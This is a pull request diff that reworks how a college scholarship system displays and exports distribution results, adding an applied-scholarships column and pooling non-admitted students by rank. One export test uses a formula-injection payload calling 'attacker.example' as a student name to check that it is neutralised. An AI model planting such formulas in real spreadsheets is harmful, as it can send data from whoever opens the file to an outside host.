### PR TITLE
feat(college): table-based distribution results with applied scholarships, aligned export

### DIFF
--- a/backend/app/api/v1/endpoints/college_review/_helpers.py
+++ b/backend/app/api/v1/endpoints/college_review/_helpers.py
@@ -295,6 +295,12 @@ def _group_items_by_sub_type(
             # read trm_depname directly — the same key manual_distribution.py,
             # payment_rosters.py and college_ranking_export_service.py use.
             "department": sd.get("trm_depname") or "",
+            # What the student APPLIED for (vs. what they were allocated) — resolved
+            # to display labels here so the panel/export never need the code map.
+            "applied_sub_types": [
+                (label_map.get(code) or {}).get("label") or code
+                for code in (item.application.scholarship_subtype_list or [])
+            ],
         }
         fallback_code = ranking_sub_type.get(item.ranking_id) or "unallocated"
 
@@ -434,7 +440,9 @@ async def load_college_distribution_results(
     items_stmt = (
         select(CollegeRankingItem)
         .options(
-            selectinload(CollegeRankingItem.application).load_only(Application.student_data, Application.deleted_at)
+            selectinload(CollegeRankingItem.application).load_only(
+                Application.student_data, Application.deleted_at, Application.scholarship_subtype_list
+            )
         )
         .where(CollegeRankingItem.ranking_id.in_(ranking_ids))
         # Explicit order: dedup below keeps the FIRST item on a priority tie, so

--- a/backend/app/api/v1/endpoints/college_review/_helpers.py
+++ b/backend/app/api/v1/endpoints/college_review/_helpers.py
@@ -301,12 +301,15 @@ def _group_items_by_sub_type(
                 (label_map.get(code) or {}).get("label") or code
                 for code in (item.application.scholarship_subtype_list or [])
             ],
+            # College rank for EVERY bucket — the panel/export pool backup rows into
+            # 未錄取 and order that pool by rank, so backup entries need it too.
+            "rank_position": item.rank_position,
         }
         fallback_code = ranking_sub_type.get(item.ranking_id) or "unallocated"
 
         handled = False
         if item.is_allocated and item.allocated_sub_type:
-            groups[item.allocated_sub_type]["admitted"].append({**student, "rank_position": item.rank_position})
+            groups[item.allocated_sub_type]["admitted"].append(student)
             handled = True
         if item.backup_allocations and isinstance(item.backup_allocations, list):
             for ba in item.backup_allocations:
@@ -318,8 +321,7 @@ def _group_items_by_sub_type(
                 groups[st_code]["backup"].append({**student, "backup_position": ba.get("backup_position")})
                 handled = True
         if not handled:
-            # Carry rank_position so the export's 名次 column is populated and sortable.
-            groups[fallback_code]["rejected"].append({**student, "rank_position": item.rank_position})
+            groups[fallback_code]["rejected"].append(student)
 
     sub_types: List[Dict[str, Any]] = []
     for code in sorted(groups.keys()):

--- a/backend/app/services/college_distribution_export_service.py
+++ b/backend/app/services/college_distribution_export_service.py
@@ -52,18 +52,11 @@ _COLUMNS: List[Tuple[str, float]] = [
     ("學號", 1.2),
     ("姓名", 1.2),
     ("系所", 1.4),
+    ("申請獎學金", 1.8),
 ]
 
 HEADERS: List[str] = [label for label, _ in _COLUMNS]
 _COL_WEIGHTS: List[float] = [weight for _, weight in _COLUMNS]
-
-# (group key, 結果 label, position field) — drives both flattening order and the
-# per-bucket position column, so 正取/備取/未錄取 ordering is defined in one place.
-_OUTCOME_BUCKETS: Tuple[Tuple[str, str, str], ...] = (
-    ("admitted", "正取", "rank_position"),
-    ("backup", "備取", "backup_position"),
-    ("rejected", "未錄取", "rank_position"),
-)
 
 
 @dataclass(frozen=True)
@@ -71,35 +64,52 @@ class DistributionExportRow:
     """One student's outcome within one sub-type."""
 
     sub_type_label: str
-    outcome: str  # 正取 / 備取 / 未錄取
+    outcome: str  # 正取 / 未錄取
     position: Optional[int]
     student_number: str
     student_name: str
     department: str
+    applied_scholarships: str
+
+
+def _export_row(sub_type_label: str, outcome: str, student: Dict[str, Any]) -> DistributionExportRow:
+    return DistributionExportRow(
+        sub_type_label=sub_type_label,
+        outcome=outcome,
+        position=student.get("rank_position"),
+        student_number=student.get("student_number") or "",
+        student_name=student.get("student_name") or "",
+        department=student.get("department") or "",
+        applied_scholarships="、".join(student.get("applied_sub_types") or []),
+    )
+
+
+def _rank_key(student: Dict[str, Any]) -> tuple:
+    rank = student.get("rank_position")
+    return (rank is None, rank or 0)
 
 
 def flatten_sub_types(sub_types: List[Dict[str, Any]]) -> List[DistributionExportRow]:
-    """Flatten the grouped loader payload into export rows.
+    """Flatten the grouped loader payload into export rows, mirroring the panel:
+    per-sub-type 正取 blocks first, then every remaining student pooled into one
+    未錄取 block sorted by college rank.
 
-    Preserves the loader's ordering (it already sorted each bucket), so the export
-    reads in the same order as the panel.
+    Rejected students arrive grouped under their RANKING's sub-type code (e.g. a
+    literal "default"), which is meaningless to the college — so 未錄取 rows carry
+    "—" as 類別 instead of that label. Backend "backup" rows fold into 未錄取 too:
+    nothing in the current distribution flow writes backup_allocations, so 備取 is
+    not a real outcome.
     """
-    rows: List[DistributionExportRow] = []
+    admitted_rows: List[DistributionExportRow] = []
+    leftover_students: List[Dict[str, Any]] = []
     for group in sub_types:
         label = group.get("label") or group.get("code") or ""
-        for key, outcome, position_field in _OUTCOME_BUCKETS:
-            for student in group.get(key) or []:
-                rows.append(
-                    DistributionExportRow(
-                        sub_type_label=label,
-                        outcome=outcome,
-                        position=student.get(position_field),
-                        student_number=student.get("student_number") or "",
-                        student_name=student.get("student_name") or "",
-                        department=student.get("department") or "",
-                    )
-                )
-    return rows
+        for student in group.get("admitted") or []:
+            admitted_rows.append(_export_row(label, "正取", student))
+        leftover_students.extend(group.get("backup") or [])
+        leftover_students.extend(group.get("rejected") or [])
+    rejected_rows = [_export_row("—", "未錄取", s) for s in sorted(leftover_students, key=_rank_key)]
+    return admitted_rows + rejected_rows
 
 
 class CollegeDistributionExportService:
@@ -267,6 +277,7 @@ class CollegeDistributionExportService:
             row.student_number,
             row.student_name,
             row.department,
+            row.applied_scholarships,
         ]
 
     def _safe_str(self, value: Any) -> str:

--- a/backend/app/tests/test_college_distribution_export_service.py
+++ b/backend/app/tests/test_college_distribution_export_service.py
@@ -22,10 +22,22 @@ def _sub_types():
             "label": "國科會",
             "label_en": "NSTC",
             "admitted": [
-                {"student_number": "310460031", "student_name": "王小明", "department": "電子研", "rank_position": 1},
+                {
+                    "student_number": "310460031",
+                    "student_name": "王小明",
+                    "department": "電子研",
+                    "rank_position": 1,
+                    "applied_sub_types": ["國科會", "教育部"],
+                },
             ],
             "backup": [
-                {"student_number": "310460033", "student_name": "張三", "department": "電子研", "backup_position": 1},
+                {
+                    "student_number": "310460033",
+                    "student_name": "張三",
+                    "department": "電子研",
+                    "backup_position": 1,
+                    "rank_position": 3,
+                },
             ],
             "rejected": [
                 {"student_number": "310460034", "student_name": "李四", "department": "資工研", "rank_position": 5},
@@ -35,25 +47,53 @@ def _sub_types():
 
 
 class TestFlatten:
-    def test_flatten_orders_admitted_then_backup_then_rejected(self):
+    def test_flatten_orders_admitted_then_pooled_rejected(self):
+        """Mirrors the panel: 正取 blocks first, then backup+rejected pooled as 未錄取."""
         rows = flatten_sub_types(_sub_types())
-        assert [r.outcome for r in rows] == ["正取", "備取", "未錄取"]
+        assert [r.outcome for r in rows] == ["正取", "未錄取", "未錄取"]
 
-    def test_flatten_picks_the_right_position_field_per_bucket(self):
+    def test_flatten_positions_are_college_rank_for_every_bucket(self):
+        """備取 folds into 未錄取 and carries its rank_position, not backup_position."""
         rows = flatten_sub_types(_sub_types())
-        assert [r.position for r in rows] == [1, 1, 5]
+        assert [r.position for r in rows] == [1, 3, 5]
 
-    def test_flatten_uses_the_sub_type_label_not_the_raw_code(self):
-        rows = flatten_sub_types(_sub_types())
-        assert all(r.sub_type_label == "國科會" for r in rows)
-
-    def test_flatten_falls_back_to_code_when_label_missing(self):
-        sub_types = [{"code": "unallocated", "admitted": [], "backup": [], "rejected": []}]
-        sub_types[0]["rejected"] = [
-            {"student_number": "X1", "student_name": "無", "department": "", "rank_position": None}
+    def test_flatten_pooled_rejected_sorted_by_rank_across_groups(self):
+        sub_types = [
+            {
+                "code": "moe",
+                "label": "教育部",
+                "admitted": [],
+                "backup": [],
+                "rejected": [{"student_number": "R2", "student_name": "乙", "department": "", "rank_position": 7}],
+            },
+            {
+                "code": "nstc",
+                "label": "國科會",
+                "admitted": [],
+                "backup": [],
+                "rejected": [{"student_number": "R1", "student_name": "甲", "department": "", "rank_position": 2}],
+            },
         ]
         rows = flatten_sub_types(sub_types)
-        assert rows[0].sub_type_label == "unallocated"
+        assert [r.student_number for r in rows] == ["R1", "R2"]
+
+    def test_flatten_uses_the_sub_type_label_for_admitted_rows(self):
+        rows = flatten_sub_types(_sub_types())
+        assert rows[0].sub_type_label == "國科會"
+
+    def test_flatten_rejected_rows_drop_the_meaningless_group_label(self):
+        """Rejected students arrive under their RANKING's sub-type code (e.g. a
+        literal "default") — the export must not surface that as 類別."""
+        rows = flatten_sub_types(_sub_types())
+        assert all(r.sub_type_label == "—" for r in rows if r.outcome == "未錄取")
+
+    def test_flatten_joins_applied_sub_types(self):
+        rows = flatten_sub_types(_sub_types())
+        assert rows[0].applied_scholarships == "國科會、教育部"
+
+    def test_flatten_missing_applied_sub_types_renders_empty_string(self):
+        rows = flatten_sub_types(_sub_types())
+        assert rows[2].applied_scholarships == ""
 
     def test_flatten_empty_sub_types_yields_no_rows(self):
         assert flatten_sub_types([]) == []
@@ -73,7 +113,7 @@ class TestBuildWorkbook:
         svc = CollegeDistributionExportService()
         payload = svc.build_workbook(rows=flatten_sub_types(_sub_types()), title="T", sheet_name="S")
         ws = self._load(payload)
-        assert [c.value for c in ws[3]] == ["國科會", "正取", 1, "310460031", "王小明", "電子研"]
+        assert [c.value for c in ws[3]] == ["國科會", "正取", 1, "310460031", "王小明", "電子研", "國科會、教育部"]
 
     def test_missing_position_renders_an_empty_cell_not_the_string_none(self):
         """A None 名次 must never render the literal string "None".
@@ -82,7 +122,7 @@ class TestBuildWorkbook:
         empty cell (readback value is None, NOT ""). Both are correct; the bug this
         guards against is the cell reading "None".
         """
-        rows = [DistributionExportRow("國科會", "未錄取", None, "X1", "無名次", "電子研")]
+        rows = [DistributionExportRow("國科會", "未錄取", None, "X1", "無名次", "電子研", "")]
         svc = CollegeDistributionExportService()
         ws = self._load(svc.build_workbook(rows=rows, title="T", sheet_name="S"))
         value = ws.cell(row=3, column=3).value
@@ -98,7 +138,7 @@ class TestBuildWorkbook:
         from SIS. Mirrors test_college_ranking_export_service.test_malicious_student_name_is_neutralized.
         """
         payload = '=WEBSERVICE("https://attacker.example/x")'
-        rows = [DistributionExportRow("國科會", "正取", 1, "X1", payload, "電子研")]
+        rows = [DistributionExportRow("國科會", "正取", 1, "X1", payload, "電子研", "")]
         svc = CollegeDistributionExportService()
         ws = self._load(svc.build_workbook(rows=rows, title="T", sheet_name="S"))
         value = ws.cell(row=3, column=5).value
@@ -116,6 +156,6 @@ class TestBuildPdf:
         assert svc.build_pdf(rows=[], title="空").startswith(b"%PDF")
 
     def test_xml_special_chars_in_name_do_not_break_rendering(self):
-        rows = [DistributionExportRow("國科會", "正取", 1, "X1", "A & B <C>", "電子研")]
+        rows = [DistributionExportRow("國科會", "正取", 1, "X1", "A & B <C>", "電子研", "")]
         svc = CollegeDistributionExportService()
         assert svc.build_pdf(rows=rows, title="T").startswith(b"%PDF")

--- a/frontend/components/college/distribution/DistributionResultPanel.tsx
+++ b/frontend/components/college/distribution/DistributionResultPanel.tsx
@@ -124,8 +124,11 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
   // 未錄取 table. Backend "backup" rows fold in too: nothing in the current
   // distribution flow ever writes backup_allocations, so 備取 is not a real state.
   const admittedGroups = data.sub_types.filter((g) => g.admitted.length > 0);
-  const byPosition = (a?: number, b?: number) =>
-    (a === undefined ? Number.MAX_SAFE_INTEGER : a) - (b === undefined ? Number.MAX_SAFE_INTEGER : b);
+  // JSON serializes a missing backend rank as null, not undefined — treat both as
+  // "no rank" so unranked rows sort LAST, matching the export's None-last ordering.
+  const byPosition = (a?: number | null, b?: number | null) =>
+    (typeof a === "number" ? a : Number.MAX_SAFE_INTEGER) -
+    (typeof b === "number" ? b : Number.MAX_SAFE_INTEGER);
   const rejectedRows: DistributionStudent[] = data.sub_types
     .flatMap((g) => [...g.backup, ...g.rejected])
     .sort((a, b) => byPosition(a.rank_position, b.rank_position));
@@ -177,8 +180,10 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
               </TableRow>
             </TableHeader>
             <TableBody>
-              {group.admitted.map((s) => (
-                <TableRow key={s.student_number} className="text-gray-700">
+              {group.admitted.map((s, i) => (
+                // student_number can be the backend's "N/A" placeholder for several
+                // students at once, so the index disambiguates the key.
+                <TableRow key={`${s.student_number}-${i}`} className="text-gray-700">
                   <TableCell className="py-2.5 text-center tabular-nums">
                     {typeof s.rank_position === "number" ? s.rank_position : "—"}
                   </TableCell>
@@ -210,8 +215,8 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
               </TableRow>
             </TableHeader>
             <TableBody>
-              {rejectedRows.map((row) => (
-                <TableRow key={row.student_number} className="text-gray-500">
+              {rejectedRows.map((row, i) => (
+                <TableRow key={`${row.student_number}-${i}`} className="text-gray-500">
                   <TableCell className="py-2.5 text-center tabular-nums">
                     {typeof row.rank_position === "number" ? row.rank_position : "—"}
                   </TableCell>

--- a/frontend/components/college/distribution/DistributionResultPanel.tsx
+++ b/frontend/components/college/distribution/DistributionResultPanel.tsx
@@ -31,9 +31,9 @@ interface DistributionResultPanelProps {
 
 type DistributionStatus = "admitted" | "backup" | "rejected";
 
-interface DistributionRow extends DistributionStudent {
-  status: DistributionStatus;
-  order?: number;
+interface PendingRow extends DistributionStudent {
+  status: "backup" | "rejected";
+  groupLabel: string;
 }
 
 const STATUS_CONFIG: Record<
@@ -140,6 +140,27 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
     return <div className="py-12 text-center text-sm text-gray-500">尚未分發，暫無結果</div>;
   }
 
+  // Rejected students come back under the RANKING's sub-type code (e.g. a literal
+  // "default" group), which is meaningless to the college — so render one card per
+  // sub-type that actually admitted students, and pool every 備取/未錄取 row into a
+  // single combined table.
+  const admittedGroups = data.sub_types.filter((g) => g.admitted.length > 0);
+  const byPosition = (a?: number, b?: number) =>
+    (a === undefined ? Number.MAX_SAFE_INTEGER : a) - (b === undefined ? Number.MAX_SAFE_INTEGER : b);
+  const pendingRows: PendingRow[] = [
+    ...data.sub_types
+      .flatMap((g) => g.backup.map((s) => ({ ...s, status: "backup" as const, groupLabel: g.label })))
+      .sort((a, b) => byPosition(a.backup_position, b.backup_position)),
+    ...data.sub_types
+      .flatMap((g) => g.rejected.map((s) => ({ ...s, status: "rejected" as const, groupLabel: g.label })))
+      .sort((a, b) => byPosition(a.rank_position, b.rank_position)),
+  ];
+  const backupCount = pendingRows.filter((r) => r.status === "backup").length;
+
+  if (admittedGroups.length === 0 && pendingRows.length === 0) {
+    return <div className="py-12 text-center text-sm text-gray-500">尚未分發，暫無結果</div>;
+  }
+
   return (
     <div className="space-y-6">
       <div className="flex justify-end">
@@ -166,60 +187,87 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
           </DropdownMenuContent>
         </DropdownMenu>
       </div>
-      {data.sub_types.map((group) => {
-        const rows: DistributionRow[] = [
-          ...group.admitted.map((s) => ({ ...s, status: "admitted" as const, order: s.rank_position })),
-          ...group.backup.map((s) => ({ ...s, status: "backup" as const, order: s.backup_position })),
-          ...group.rejected.map((s) => ({ ...s, status: "rejected" as const })),
-        ];
-        return (
-          <div key={group.code} className="overflow-hidden rounded-lg border border-gray-200 bg-white">
-            <div className="flex flex-wrap items-center justify-between gap-2 border-b border-gray-200 bg-gray-50/80 px-4 py-3">
-              <h3 className="text-base font-semibold text-gray-800">{group.label}</h3>
-              <div className="flex items-center gap-4">
-                <StatusCount status="admitted" count={group.admitted.length} />
-                <StatusCount status="backup" count={group.backup.length} />
-                <StatusCount status="rejected" count={group.rejected.length} />
-              </div>
-            </div>
-            {rows.length === 0 ? (
-              <p className="px-4 py-8 text-center text-sm text-gray-400">此類別暫無分發名單</p>
-            ) : (
-              <Table>
-                <TableHeader>
-                  <TableRow className="hover:bg-transparent">
-                    <TableHead className="h-10 w-20 text-center">順位</TableHead>
-                    <TableHead className="h-10 w-24">狀態</TableHead>
-                    <TableHead className="h-10">姓名</TableHead>
-                    <TableHead className="h-10">學號</TableHead>
-                    <TableHead className="h-10">系所</TableHead>
-                  </TableRow>
-                </TableHeader>
-                <TableBody>
-                  {rows.map((row) => (
-                    <TableRow
-                      key={`${row.status}-${row.student_number}`}
-                      className={row.status === "rejected" ? "text-gray-400" : "text-gray-700"}
-                    >
-                      <TableCell className="py-2.5 text-center tabular-nums">
-                        {typeof row.order === "number" ? row.order : "—"}
-                      </TableCell>
-                      <TableCell className="py-2.5">
-                        <Badge variant="outline" className={STATUS_CONFIG[row.status].badgeClass}>
-                          {STATUS_CONFIG[row.status].label}
-                        </Badge>
-                      </TableCell>
-                      <TableCell className="py-2.5 font-medium">{row.student_name}</TableCell>
-                      <TableCell className="py-2.5 tabular-nums">{row.student_number}</TableCell>
-                      <TableCell className="py-2.5">{row.department || "—"}</TableCell>
-                    </TableRow>
-                  ))}
-                </TableBody>
-              </Table>
-            )}
+      {admittedGroups.map((group) => (
+        <div key={group.code} className="overflow-hidden rounded-lg border border-gray-200 bg-white">
+          <div className="flex flex-wrap items-center justify-between gap-2 border-b border-gray-200 bg-gray-50/80 px-4 py-3">
+            <h3 className="text-base font-semibold text-gray-800">{group.label}</h3>
+            <StatusCount status="admitted" count={group.admitted.length} />
           </div>
-        );
-      })}
+          <Table>
+            <TableHeader>
+              <TableRow className="hover:bg-transparent">
+                <TableHead className="h-10 w-20 text-center">順位</TableHead>
+                <TableHead className="h-10">姓名</TableHead>
+                <TableHead className="h-10">學號</TableHead>
+                <TableHead className="h-10">系所</TableHead>
+              </TableRow>
+            </TableHeader>
+            <TableBody>
+              {group.admitted.map((s) => (
+                <TableRow key={s.student_number} className="text-gray-700">
+                  <TableCell className="py-2.5 text-center tabular-nums">
+                    {typeof s.rank_position === "number" ? s.rank_position : "—"}
+                  </TableCell>
+                  <TableCell className="py-2.5 font-medium">{s.student_name}</TableCell>
+                  <TableCell className="py-2.5 tabular-nums">{s.student_number}</TableCell>
+                  <TableCell className="py-2.5">{s.department || "—"}</TableCell>
+                </TableRow>
+              ))}
+            </TableBody>
+          </Table>
+        </div>
+      ))}
+
+      {pendingRows.length > 0 && (
+        <div className="overflow-hidden rounded-lg border border-gray-200 bg-white">
+          <div className="flex flex-wrap items-center justify-between gap-2 border-b border-gray-200 bg-gray-50/80 px-4 py-3">
+            <h3 className="text-base font-semibold text-gray-800">備取／未錄取</h3>
+            <div className="flex items-center gap-4">
+              <StatusCount status="backup" count={backupCount} />
+              <StatusCount status="rejected" count={pendingRows.length - backupCount} />
+            </div>
+          </div>
+          <Table>
+            <TableHeader>
+              <TableRow className="hover:bg-transparent">
+                <TableHead className="h-10 w-24">狀態</TableHead>
+                <TableHead className="h-10 w-24 text-center">備取序</TableHead>
+                {backupCount > 0 && <TableHead className="h-10">申請類別</TableHead>}
+                <TableHead className="h-10">姓名</TableHead>
+                <TableHead className="h-10">學號</TableHead>
+                <TableHead className="h-10">系所</TableHead>
+              </TableRow>
+            </TableHeader>
+            <TableBody>
+              {pendingRows.map((row) => (
+                <TableRow
+                  key={`${row.status}-${row.groupLabel}-${row.student_number}`}
+                  className={row.status === "rejected" ? "text-gray-400" : "text-gray-700"}
+                >
+                  <TableCell className="py-2.5">
+                    <Badge variant="outline" className={STATUS_CONFIG[row.status].badgeClass}>
+                      {STATUS_CONFIG[row.status].label}
+                    </Badge>
+                  </TableCell>
+                  <TableCell className="py-2.5 text-center tabular-nums">
+                    {row.status === "backup" && typeof row.backup_position === "number"
+                      ? row.backup_position
+                      : "—"}
+                  </TableCell>
+                  {backupCount > 0 && (
+                    <TableCell className="py-2.5">
+                      {row.status === "backup" ? row.groupLabel : "—"}
+                    </TableCell>
+                  )}
+                  <TableCell className="py-2.5 font-medium">{row.student_name}</TableCell>
+                  <TableCell className="py-2.5 tabular-nums">{row.student_number}</TableCell>
+                  <TableCell className="py-2.5">{row.department || "—"}</TableCell>
+                </TableRow>
+              ))}
+            </TableBody>
+          </Table>
+        </div>
+      )}
     </div>
   );
 }

--- a/frontend/components/college/distribution/DistributionResultPanel.tsx
+++ b/frontend/components/college/distribution/DistributionResultPanel.tsx
@@ -20,7 +20,6 @@ import {
   TableHeader,
   TableRow,
 } from "@/components/ui/table";
-import { Badge } from "@/components/ui/badge";
 import { Button } from "@/components/ui/button";
 import { triggerBlobDownload } from "@/lib/utils/download";
 
@@ -29,32 +28,11 @@ interface DistributionResultPanelProps {
   scholarshipType: { id: number; code: string; name: string };
 }
 
-type DistributionStatus = "admitted" | "backup" | "rejected";
+type DistributionStatus = "admitted" | "rejected";
 
-interface PendingRow extends DistributionStudent {
-  status: "backup" | "rejected";
-  groupLabel: string;
-}
-
-const STATUS_CONFIG: Record<
-  DistributionStatus,
-  { label: string; badgeClass: string; dotClass: string }
-> = {
-  admitted: {
-    label: "正取",
-    badgeClass: "border-emerald-200 bg-emerald-50 text-emerald-700",
-    dotClass: "bg-emerald-500",
-  },
-  backup: {
-    label: "備取",
-    badgeClass: "border-amber-200 bg-amber-50 text-amber-700",
-    dotClass: "bg-amber-500",
-  },
-  rejected: {
-    label: "未錄取",
-    badgeClass: "border-gray-200 bg-gray-100 text-gray-500",
-    dotClass: "bg-gray-400",
-  },
+const STATUS_CONFIG: Record<DistributionStatus, { label: string; dotClass: string }> = {
+  admitted: { label: "正取", dotClass: "bg-emerald-500" },
+  rejected: { label: "未錄取", dotClass: "bg-gray-400" },
 };
 
 export function DistributionResultPanel({ scholarshipType }: DistributionResultPanelProps) {
@@ -142,22 +120,17 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
 
   // Rejected students come back under the RANKING's sub-type code (e.g. a literal
   // "default" group), which is meaningless to the college — so render one card per
-  // sub-type that actually admitted students, and pool every 備取/未錄取 row into a
-  // single combined table.
+  // sub-type that actually admitted students, and pool everyone else into a single
+  // 未錄取 table. Backend "backup" rows fold in too: nothing in the current
+  // distribution flow ever writes backup_allocations, so 備取 is not a real state.
   const admittedGroups = data.sub_types.filter((g) => g.admitted.length > 0);
   const byPosition = (a?: number, b?: number) =>
     (a === undefined ? Number.MAX_SAFE_INTEGER : a) - (b === undefined ? Number.MAX_SAFE_INTEGER : b);
-  const pendingRows: PendingRow[] = [
-    ...data.sub_types
-      .flatMap((g) => g.backup.map((s) => ({ ...s, status: "backup" as const, groupLabel: g.label })))
-      .sort((a, b) => byPosition(a.backup_position, b.backup_position)),
-    ...data.sub_types
-      .flatMap((g) => g.rejected.map((s) => ({ ...s, status: "rejected" as const, groupLabel: g.label })))
-      .sort((a, b) => byPosition(a.rank_position, b.rank_position)),
-  ];
-  const backupCount = pendingRows.filter((r) => r.status === "backup").length;
+  const rejectedRows: DistributionStudent[] = data.sub_types
+    .flatMap((g) => [...g.backup, ...g.rejected])
+    .sort((a, b) => byPosition(a.rank_position, b.rank_position));
 
-  if (admittedGroups.length === 0 && pendingRows.length === 0) {
+  if (admittedGroups.length === 0 && rejectedRows.length === 0) {
     return <div className="py-12 text-center text-sm text-gray-500">尚未分發，暫無結果</div>;
   }
 
@@ -218,47 +191,27 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
         </div>
       ))}
 
-      {pendingRows.length > 0 && (
+      {rejectedRows.length > 0 && (
         <div className="overflow-hidden rounded-lg border border-gray-200 bg-white">
           <div className="flex flex-wrap items-center justify-between gap-2 border-b border-gray-200 bg-gray-50/80 px-4 py-3">
-            <h3 className="text-base font-semibold text-gray-800">備取／未錄取</h3>
-            <div className="flex items-center gap-4">
-              <StatusCount status="backup" count={backupCount} />
-              <StatusCount status="rejected" count={pendingRows.length - backupCount} />
-            </div>
+            <h3 className="text-base font-semibold text-gray-800">未錄取</h3>
+            <StatusCount status="rejected" count={rejectedRows.length} />
           </div>
           <Table>
             <TableHeader>
               <TableRow className="hover:bg-transparent">
-                <TableHead className="h-10 w-24">狀態</TableHead>
-                <TableHead className="h-10 w-24 text-center">備取序</TableHead>
-                {backupCount > 0 && <TableHead className="h-10">申請類別</TableHead>}
+                <TableHead className="h-10 w-20 text-center">排名</TableHead>
                 <TableHead className="h-10">姓名</TableHead>
                 <TableHead className="h-10">學號</TableHead>
                 <TableHead className="h-10">系所</TableHead>
               </TableRow>
             </TableHeader>
             <TableBody>
-              {pendingRows.map((row) => (
-                <TableRow
-                  key={`${row.status}-${row.groupLabel}-${row.student_number}`}
-                  className={row.status === "rejected" ? "text-gray-400" : "text-gray-700"}
-                >
-                  <TableCell className="py-2.5">
-                    <Badge variant="outline" className={STATUS_CONFIG[row.status].badgeClass}>
-                      {STATUS_CONFIG[row.status].label}
-                    </Badge>
-                  </TableCell>
+              {rejectedRows.map((row) => (
+                <TableRow key={row.student_number} className="text-gray-500">
                   <TableCell className="py-2.5 text-center tabular-nums">
-                    {row.status === "backup" && typeof row.backup_position === "number"
-                      ? row.backup_position
-                      : "—"}
+                    {typeof row.rank_position === "number" ? row.rank_position : "—"}
                   </TableCell>
-                  {backupCount > 0 && (
-                    <TableCell className="py-2.5">
-                      {row.status === "backup" ? row.groupLabel : "—"}
-                    </TableCell>
-                  )}
                   <TableCell className="py-2.5 font-medium">{row.student_name}</TableCell>
                   <TableCell className="py-2.5 tabular-nums">{row.student_number}</TableCell>
                   <TableCell className="py-2.5">{row.department || "—"}</TableCell>

--- a/frontend/components/college/distribution/DistributionResultPanel.tsx
+++ b/frontend/components/college/distribution/DistributionResultPanel.tsx
@@ -173,6 +173,7 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
                 <TableHead className="h-10">姓名</TableHead>
                 <TableHead className="h-10">學號</TableHead>
                 <TableHead className="h-10">系所</TableHead>
+                <TableHead className="h-10">申請獎學金</TableHead>
               </TableRow>
             </TableHeader>
             <TableBody>
@@ -184,6 +185,7 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
                   <TableCell className="py-2.5 font-medium">{s.student_name}</TableCell>
                   <TableCell className="py-2.5 tabular-nums">{s.student_number}</TableCell>
                   <TableCell className="py-2.5">{s.department || "—"}</TableCell>
+                  <TableCell className="py-2.5">{s.applied_sub_types?.join("、") || "—"}</TableCell>
                 </TableRow>
               ))}
             </TableBody>
@@ -204,6 +206,7 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
                 <TableHead className="h-10">姓名</TableHead>
                 <TableHead className="h-10">學號</TableHead>
                 <TableHead className="h-10">系所</TableHead>
+                <TableHead className="h-10">申請獎學金</TableHead>
               </TableRow>
             </TableHeader>
             <TableBody>
@@ -215,6 +218,7 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
                   <TableCell className="py-2.5 font-medium">{row.student_name}</TableCell>
                   <TableCell className="py-2.5 tabular-nums">{row.student_number}</TableCell>
                   <TableCell className="py-2.5">{row.department || "—"}</TableCell>
+                  <TableCell className="py-2.5">{row.applied_sub_types?.join("、") || "—"}</TableCell>
                 </TableRow>
               ))}
             </TableBody>

--- a/frontend/components/college/distribution/DistributionResultPanel.tsx
+++ b/frontend/components/college/distribution/DistributionResultPanel.tsx
@@ -5,13 +5,22 @@ import { Loader2, Download, FileSpreadsheet, FileText } from "lucide-react";
 import { toast } from "sonner";
 import { User } from "@/types/user";
 import { useCollegeManagement } from "@/contexts/college-management-context";
-import type { DistributionResults } from "@/lib/api/modules/college";
+import type { DistributionResults, DistributionStudent } from "@/lib/api/modules/college";
 import {
   DropdownMenu,
   DropdownMenuContent,
   DropdownMenuItem,
   DropdownMenuTrigger,
 } from "@/components/ui/dropdown-menu";
+import {
+  Table,
+  TableBody,
+  TableCell,
+  TableHead,
+  TableHeader,
+  TableRow,
+} from "@/components/ui/table";
+import { Badge } from "@/components/ui/badge";
 import { Button } from "@/components/ui/button";
 import { triggerBlobDownload } from "@/lib/utils/download";
 
@@ -19,6 +28,34 @@ interface DistributionResultPanelProps {
   user: User;
   scholarshipType: { id: number; code: string; name: string };
 }
+
+type DistributionStatus = "admitted" | "backup" | "rejected";
+
+interface DistributionRow extends DistributionStudent {
+  status: DistributionStatus;
+  order?: number;
+}
+
+const STATUS_CONFIG: Record<
+  DistributionStatus,
+  { label: string; badgeClass: string; dotClass: string }
+> = {
+  admitted: {
+    label: "正取",
+    badgeClass: "border-emerald-200 bg-emerald-50 text-emerald-700",
+    dotClass: "bg-emerald-500",
+  },
+  backup: {
+    label: "備取",
+    badgeClass: "border-amber-200 bg-amber-50 text-amber-700",
+    dotClass: "bg-amber-500",
+  },
+  rejected: {
+    label: "未錄取",
+    badgeClass: "border-gray-200 bg-gray-100 text-gray-500",
+    dotClass: "bg-gray-400",
+  },
+};
 
 export function DistributionResultPanel({ scholarshipType }: DistributionResultPanelProps) {
   const { selectedAcademicYear, selectedSemester } = useCollegeManagement();
@@ -129,70 +166,71 @@ export function DistributionResultPanel({ scholarshipType }: DistributionResultP
           </DropdownMenuContent>
         </DropdownMenu>
       </div>
-      {data.sub_types.map((group) => (
-        <div key={group.code} className="rounded-lg border border-gray-200 bg-white p-4">
-          <h3 className="mb-3 text-base font-semibold text-gray-800">{group.label}</h3>
-
-          <Section title="正取" tone="emerald">
-            {group.admitted.map((s) => (
-              <Row key={`a-${s.student_number}`} order={s.rank_position} name={s.student_name} id={s.student_number} department={s.department} />
-            ))}
-          </Section>
-
-          <Section title="備取" tone="amber">
-            {group.backup.map((s) => (
-              <Row key={`b-${s.student_number}`} order={s.backup_position} name={s.student_name} id={s.student_number} department={s.department} />
-            ))}
-          </Section>
-
-          <Section title="未錄取" tone="gray">
-            {group.rejected.map((s) => (
-              <Row key={`r-${s.student_number}`} name={s.student_name} id={s.student_number} department={s.department} />
-            ))}
-          </Section>
-        </div>
-      ))}
+      {data.sub_types.map((group) => {
+        const rows: DistributionRow[] = [
